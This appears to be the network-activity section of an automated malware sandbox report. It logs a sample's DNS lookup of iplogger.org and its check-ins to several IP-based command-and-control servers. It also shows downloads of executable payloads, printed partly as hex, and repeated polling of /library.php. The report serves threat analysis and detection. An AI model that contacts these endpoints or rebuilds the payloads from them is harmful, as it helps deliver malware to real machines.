Oct 3, 2022 17:43:01.259056091 CEST	53	56331	8.8.8.8	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 3, 2022 17:43:01.238493919 CEST	192.168.2.6	8.8.8.8	0x8600	Standard query (0)	iplogger.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 3, 2022 17:43:01.259056091 CEST	8.8.8.8	192.168.2.6	0x8600	No error (0)	iplogger.org		148.251.234.83	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

iplogger.org

208.67.104.97

85.31.46.167

107.182.129.235

171.22.30.106

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49712	148.251.234.83	443	C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.6	49710	208.67.104.97	80	C:\Users\user\Desktop\file.exe

Timestamp	kBytes transferred	Direction	Data
Oct 3, 2022 17:42:17.386774063 CEST	100	OUT	GET /powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixinte HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 1 Host: 208.67.104.97 Connection: Keep-Alive Cache-Control: no-cache
Oct 3, 2022 17:42:19.242346048 CEST	100	IN	HTTP/1.1 200 OK Date: Mon, 03 Oct 2022 15:42:17 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.6	49711	85.31.46.167	80	C:\Users\user\Desktop\file.exe

Timestamp	kBytes transferred	Direction	Data
Oct 3, 2022 17:42:20.348063946 CEST	101	OUT	GET /software.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: D Host: 85.31.46.167 Connection: Keep-Alive Cache-Control: no-cache
Oct 3, 2022 17:42:20.375627995 CEST	102	IN	HTTP/1.1 200 OK Date: Mon, 03 Oct 2022 15:42:20 GMT Server: Apache/2.4.41 (Ubuntu) Pragma: public Expires: 0 Cache-Control: must-revalidate, post-check=0, pre-check=0 Cache-Control: private Content-Disposition: attachment; filename="dll"; Content-Transfer-Encoding: binary Content-Length: 242176 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/octet-stream Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 a6 03 00 00 20 00 00 00 a8 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 04 00 00 00 e0 03 00 00 06 00 00 00 aa 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 04 00 00 02 00 00 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 c6 03 00 00 00 00 00 48 00 00 00 02 00 05 00 a0 60 02 00 34 65 01 00 01 00 00 00 00 00 00 00 90 55 01 00 10 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7d 00 59 00 79 00 3d 00 7b 00 58 00 78 00 3d 00 8a 72 93 00 00 70 04 6f 32 00 00 0a 8c 6f 00 00 01 28 33 00 00 0a 02 04 6f 32 00 00 0a 7d 05 00 00 04 2a 3a 02 03 73 01 00 00 06 04 28 02 00 00 06 2a 1e 17 80 06 00 00 04 2a 32 72 df 00 00 70 28 3b 00 00 0a 26 2a 56 72 a8 0f 00 70 80 07 00 00 04 72 a8 0f 00 70 80 08 00 00 04 2a 1e 02 28 1f 00 00 0a 2a 3e 02 fe 15 06 00 00 02 02 03 7d 09 00 00 04 2a be 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 28 45 00 00 0a 7d 09 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 47 00 00 0a 26 2a 3e 02 fe 15 07 00 00 02 02 03 7d 0e 00 00 04 2a aa 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 7d 0e 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 48 00 00 0a 26 2a 22 02 fe 15 08 00 00 02 2a 3e 02 fe 15 09 00 00 02 02 03 7d 18 00 00 04 2a 52 02 03 7d 20 00 00 04 02 02 7b 20 00 00 04 6f 6f 00 00 0a 2a 1e 02 7b 20 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELJlX!. @W H.text4 `.rsrc@@.reloc@BH`4eU}Yy={Xx=rpo2o(3o2}:s(2rp(;&Vrprp(>}(Co(D(E}(F(E(G&>}(Co(D}(F(E(H&">}R} { oo*{
Oct 3, 2022 17:42:20.637722969 CEST	354	OUT	GET /software.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: E Host: 85.31.46.167 Connection: Keep-Alive Cache-Control: no-cache
Oct 3, 2022 17:42:20.669107914 CEST	355	IN	HTTP/1.1 200 OK Date: Mon, 03 Oct 2022 15:42:20 GMT Server: Apache/2.4.41 (Ubuntu) Pragma: public Expires: 0 Cache-Control: must-revalidate, post-check=0, pre-check=0 Cache-Control: private Content-Disposition: attachment; filename="soft"; Content-Transfer-Encoding: binary Content-Length: 3947920 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: application/octet-stream Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f1 9a e4 ea 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 e4 14 00 00 0c 00 00 00 00 00 00 a6 02 15 00 00 20 00 00 00 20 15 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 15 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 02 15 00 4f 00 00 00 00 20 15 00 32 09 00 00 00 00 00 00 00 00 00 00 00 28 3c 00 90 15 00 00 00 40 15 00 0c 00 00 00 38 02 15 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ac e2 14 00 00 20 00 00 00 e4 14 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 32 09 00 00 00 20 15 00 00 0a 00 00 00 e6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 15 00 00 02 00 00 00 f0 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 02 15 00 00 00 00 00 48 00 00 00 02 00 05 00 68 81 00 00 40 45 00 00 01 00 00 00 54 00 00 06 a8 c6 00 00 90 3b 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 13 00 00 0a 2a 1e 02 28 13 00 00 0a 2a ae 7e 01 00 00 04 2d 1e 72 01 00 00 70 d0 03 00 00 02 28 14 00 00 0a 6f 15 00 00 0a 73 16 00 00 0a 80 01 00 00 04 7e 01 00 00 04 2a 1a 7e 02 00 00 04 2a 1e 02 80 02 00 00 04 2a 6a 28 03 00 00 06 72 3d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 4d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 b7 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 cb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 d9 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 eb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 1f 01 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 1a 7e 03 00 00 04 2a 1e 02 28 18 00 00 0a 2a 56 73 0e 00 00 06 28 19 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL"0 @ ``TO 2(<@8 H.text `.rsrc2 @@.reloc@@BHh@ET;((~-rp(os~~j(r=p~otj(rMp~otj(rp~otj(rp~otj(rp~otj(rp~otj(rp~ot~(Vs(

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.6	49713	208.67.104.97	80	C:\Users\user\Desktop\file.exe

Timestamp	kBytes transferred	Direction	Data
Oct 3, 2022 17:43:41.216011047 CEST	4575	OUT	GET /powfhxhxcjzx/ping.php?sub=NOSUB&stream=mixtwo&substream=mixinte HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 1 Host: 208.67.104.97 Connection: Keep-Alive Cache-Control: no-cache
Oct 3, 2022 17:43:43.067961931 CEST	4575	IN	HTTP/1.1 200 OK Date: Mon, 03 Oct 2022 15:43:41 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.6	49714	107.182.129.235	80	C:\Users\user\Desktop\file.exe

Timestamp	kBytes transferred	Direction	Data
Oct 3, 2022 17:43:43.209049940 CEST	4576	OUT	GET /storage/ping.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 0 Host: 107.182.129.235 Connection: Keep-Alive Cache-Control: no-cache
Oct 3, 2022 17:43:43.236627102 CEST	4576	IN	HTTP/1.1 200 OK Date: Mon, 03 Oct 2022 15:43:43 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 17 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 55 77 55 6f 6f 6f 49 49 72 77 67 68 32 34 75 75 55 Data Ascii: UwUoooIIrwgh24uuU
Oct 3, 2022 17:43:43.308698893 CEST	4577	OUT	GET /storage/extension.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 1 Host: 107.182.129.235 Connection: Keep-Alive Cache-Control: no-cache
Oct 3, 2022 17:43:43.336393118 CEST	4578	IN	HTTP/1.1 200 OK Date: Mon, 03 Oct 2022 15:43:43 GMT Server: Apache/2.4.41 (Ubuntu) Pragma: public Expires: 0 Cache-Control: must-revalidate, post-check=0, pre-check=0 Cache-Control: private Content-Disposition: attachment; filename="fuckingdllENCR.dll"; Content-Transfer-Encoding: binary Content-Length: 94224 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: application/octet-stream Data Raw: f9 f1 a9 b8 8b 6d 69 b2 02 e6 7d 3b a6 18 dc 46 22 cd 29 c1 54 8d 11 27 4b 3b 1b ff ec e2 4f bb 59 30 3a cd fb c8 c6 19 33 6a e8 b1 5c 17 49 6a ea 32 52 c5 89 50 17 fc 06 dd 43 07 19 e2 71 a9 7c d1 32 a8 0e fe be ec b3 69 52 32 57 f5 46 e8 b4 ab 43 3d 4d 55 b9 a4 16 cb 8b 9e 85 48 36 99 ea f5 41 e4 94 1a 97 d3 d7 40 7f fa 4f a6 63 1a 89 89 4d 87 78 38 ce 94 d2 e4 b0 4c ae e0 2d 20 c9 88 ab 62 96 84 7c 12 43 b2 c0 e7 8e a4 5a 7d a5 77 d7 94 2e d1 6c 1a 61 cd 61 54 b4 87 c2 a5 62 72 2c 19 c8 18 36 77 23 06 6a c2 50 d9 8c 6c 69 f4 88 3d fc b4 ca 1b 0e c0 6f ac 1e b2 92 93 cf ee 53 e9 7b ab eb 52 94 a4 e6 e4 2e 94 d9 d2 35 d5 a0 15 92 ec a7 23 3b 93 d0 94 82 04 2d fb d3 f1 e8 62 2b 19 e3 8b 47 28 90 3e cb 02 51 05 b9 e0 f5 a5 69 4e 7b 90 2b 79 0c 1d d0 5a 43 e7 ae 7a 33 73 45 cd f0 ae fa 54 0d d3 32 df 4a 10 84 ce 33 bf 39 55 d6 34 26 f6 b2 50 d4 e5 c7 c7 cb d7 b0 e1 89 22 77 49 fa a4 b9 cb e0 40 cb c3 b5 ae da 78 25 3e 90 be 44 0e d5 80 27 7a 09 5e fb 01 d3 d4 5e 28 bc 07 0d a4 87 4e 43 ca 5b 5b 6b d9 0a ba c8 f0 ff 95 eb ca 9c d2 56 5d 47 f1 d2 29 65 0f 7f b4 94 bf 60 c5 c5 d4 ea b1 07 18 ee 4b 2f 4c d0 55 6c 12 19 46 1f 15 22 8a ed 38 24 16 41 64 ef fa aa e4 3a 69 b5 67 a6 f4 30 81 64 db 0f d8 5b 2e a9 cf 54 22 6c 90 55 c0 4d 00 3d 17 30 b1 b0 ef 2c de d9 2c e7 99 83 6b 75 d4 57 2c c3 d1 f7 f9 f3 37 60 51 cf 46 69 3d 77 13 f9 e3 75 f1 dc 3a 8f 97 51 2d ca 52 a0 7d 30 1c c8 eb ac 4c ba ad 82 8f bd 6e c9 0a 1c 74 a4 6e 76 c0 1f eb 06 07 7a c3 c0 18 0c 65 9e e8 49 c0 43 00 01 b3 b6 d2 39 bf 56 8c 7e 31 2b 5b 5d 06 cb 9f 37 f5 04 af 78 51 1d e7 a4 f8 12 02 f6 b0 06 24 81 4c 00 1c 6f e9 65 51 c7 86 2f c8 62 c9 82 f8 5a 96 0c e4 de c1 e4 70 5d 96 3b 69 2a 29 d1 a6 bd 96 23 b9 62 ef 14 f0 25 31 95 ea 11 0d 8c db bf ec f8 40 a0 17 82 47 ff e1 5b 02 97 d9 b7 9b a6 85 0d 2f 00 63 ca 8e 5a 19 f7 ea 08 d1 81 f4 47 95 3a 0f a1 6e 90 a8 45 d3 69 08 4f af 9c 6f af 55 1e 42 c9 50 78 d3 de b2 de 0b 31 7b 2c 61 10 da cf f3 f6 23 6b cd ad 64 6a be ed 4c 34 cc 0f d2 7d da 64 3c 95 14 a4 a8 d5 d9 49 79 79 c4 a0 4a a7 fb 66 ee 57 c4 10 2c 5e 76 56 da 41 6f d4 4b d4 22 2b 4f 58 38 21 46 a7 02 f1 59 50 8b ea bd f5 75 b6 2d e6 ed 42 69 6b eb a5 5b e2 75 05 9b c1 26 57 74 bc 84 50 af f4 7f 6d cf 00 10 8e 5e 20 c8 9a c9 6b 7e e2 01 2e a3 90 6c fe d3 6f a6 7a 4d 56 1c 21 73 2e ed b6 68 80 f0 c3 7b 0f 6e 32 3b 7a d7 d9 cc 4b db 04 3f 53 c5 93 f4 2d 96 0d f9 65 57 e0 e0 ac cf 63 dc fa f2 1b e6 2d 56 dd 62 67 ff ff 39 da 49 c5 05 67 ba 78 fa 67 cb b7 ba ef 7d c3 27 e6 35 d2 c0 28 2a 50 b3 e8 b7 93 c8 4a 23 97 18 3a b5 49 53 b4 08 44 7d 8e 76 8a 97 c3 09 ea 9d 15 6a 4b 39 03 4c 51 46 aa 0f 00 Data Ascii: mi};F")T'K;OY0:3j\Ij2RPCq\|2iR2WFC=MUH6A@OcMx8L- b\|CZ}w.laaTbr,6w#jPli=oS{R.5#;-b+G(>QiN{+yZCz3sET2J39U4&P"wI@x%>D'z^^(NC[[kV]G)e`K/LUlF"8$Ad:ig0d[.T"lUM=0,,kuW,7`QFi=wu:Q-R}0LntnvzeIC9V~1+[]7xQ$LoeQ/bZp];i)#b%1@G[/cZG:nEiOoUBPx1{,a#kdjL4}d<IyyJfW,^vVAoK"+OX8!FYPu-Bik[u&WtPm^ k~.lozMV!s.h{n2;zK?S-eWc-Vbg9Igxg}'5(PJ#:ISD}vjK9LQF

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.6	49715	171.22.30.106	80	C:\Users\user\Desktop\file.exe

Timestamp	kBytes transferred	Direction	Data
Oct 3, 2022 17:43:43.576761007 CEST	4677	OUT	GET /library.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 2 Host: 171.22.30.106 Connection: Keep-Alive Cache-Control: no-cache
Oct 3, 2022 17:43:44.124228001 CEST	4677	IN	HTTP/1.1 200 OK Date: Mon, 03 Oct 2022 15:43:43 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Oct 3, 2022 17:43:46.440035105 CEST	4677	OUT	GET /library.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 2 Host: 171.22.30.106 Connection: Keep-Alive Cache-Control: no-cache
Oct 3, 2022 17:43:46.964653969 CEST	4678	IN	HTTP/1.1 200 OK Date: Mon, 03 Oct 2022 15:43:46 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Oct 3, 2022 17:43:49.006376982 CEST	4678	OUT	GET /library.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 2 Host: 171.22.30.106 Connection: Keep-Alive Cache-Control: no-cache
Oct 3, 2022 17:43:49.520315886 CEST	4679	IN	HTTP/1.1 200 OK Date: Mon, 03 Oct 2022 15:43:49 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Oct 3, 2022 17:43:51.568469048 CEST	4679	OUT	GET /library.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 2 Host: 171.22.30.106 Connection: Keep-Alive Cache-Control: no-cache
Oct 3, 2022 17:43:52.092350960 CEST	4680	IN	HTTP/1.1 200 OK Date: Mon, 03 Oct 2022 15:43:51 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Oct 3, 2022 17:43:54.145493984 CEST	4680	OUT	GET /library.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 2 Host: 171.22.30.106 Connection: Keep-Alive Cache-Control: no-cache
Oct 3, 2022 17:43:54.672375917 CEST	4680	IN	HTTP/1.1 200 OK Date: Mon, 03 Oct 2022 15:43:54 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Oct 3, 2022 17:43:56.709244013 CEST	4681	OUT	GET /library.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 2 Host: 171.22.30.106 Connection: Keep-Alive Cache-Control: no-cache
Oct 3, 2022 17:43:57.240268946 CEST	4682	IN	HTTP/1.1 200 OK Date: Mon, 03 Oct 2022 15:43:56 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Oct 3, 2022 17:43:59.286329031 CEST	4682	OUT	GET /library.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 2 Host: 171.22.30.106 Connection: Keep-Alive Cache-Control: no-cache
Oct 3, 2022 17:43:59.814461946 CEST	4683	IN	HTTP/1.1 200 OK Date: Mon, 03 Oct 2022 15:43:59 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=94 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Oct 3, 2022 17:44:02.014844894 CEST	4683	OUT	GET /library.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 2 Host: 171.22.30.106 Connection: Keep-Alive Cache-Control: no-cache
Oct 3, 2022 17:44:02.541059971 CEST	4683	IN	HTTP/1.1 200 OK Date: Mon, 03 Oct 2022 15:44:02 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Oct 3, 2022 17:44:04.922621965 CEST	4684	OUT	GET /library.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 2 Host: 171.22.30.106 Connection: Keep-Alive Cache-Control: no-cache
Oct 3, 2022 17:44:05.470845938 CEST	4684	IN	HTTP/1.1 200 OK Date: Mon, 03 Oct 2022 15:44:04 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Oct 3, 2022 17:44:07.506227016 CEST	4685	OUT	GET /library.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 2 Host: 171.22.30.106 Connection: Keep-Alive Cache-Control: no-cache
Oct 3, 2022 17:44:08.069984913 CEST	4685	IN	HTTP/1.1 200 OK Date: Mon, 03 Oct 2022 15:44:07 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Oct 3, 2022 17:44:10.115916967 CEST	4686	OUT	GET /library.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 2 Host: 171.22.30.106 Connection: Keep-Alive Cache-Control: no-cache
Oct 3, 2022 17:44:10.645729065 CEST	4686	IN	HTTP/1.1 200 OK Date: Mon, 03 Oct 2022 15:44:10 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=90 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49712	148.251.234.83	443	C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe

Timestamp	kBytes transferred	Direction	Data
